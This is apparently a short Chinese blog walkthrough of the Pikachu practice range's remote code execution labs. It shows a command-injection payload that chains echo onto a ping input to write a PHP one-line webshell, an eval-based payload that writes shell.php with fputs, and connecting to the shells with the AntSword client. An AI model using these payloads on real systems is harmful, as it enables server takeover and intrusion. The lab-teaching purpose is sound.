Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
tanglinS2 分钟前
工业陶瓷榜单:国内精密工业陶瓷零部件供应商综合选型参考
大数据·运维·人工智能·gpt·材质
星夜夏空994 分钟前
网络编程(4)—— Reactor模型介绍
运维·服务器·网络
vortex510 分钟前
ss 命令指南:网络排查神器
linux·运维·网络·终端
智塑未来13 分钟前
鸿蒙系统小红书隐私保护——应用锁开启指南
服务器·前端·harmonyos
小此方1 小时前
Re:Linux系统篇(五十二)线程篇 · 五:直击 Linux 内核底层:TCB 与 LWP 一体两面全解析(附自定义线程封装)
linux·运维·驱动开发
做一个AK梦9 小时前
安全架构设计理论与实践-软考架构师
安全·安全架构
cakeism8259 小时前
Gitee CodePecker 软件供应链恶意投毒监测与治理平台:从被动响应到主动防御的供应链安全体系
安全·gitee
2601_955759419 小时前
ClaudeAPI第三方系统接入安全审查指南
安全
微三云 - 廖会灵 (私域系统开发)11 小时前
抖店 OPC 自动化运营系统架构与商业代理分控体系完整解析
运维·系统架构·自动化
G311354227312 小时前
大模型不可用时,业务还能不能继续:企业需要设计降级方案
大数据·服务器·数据库·人工智能·深度学习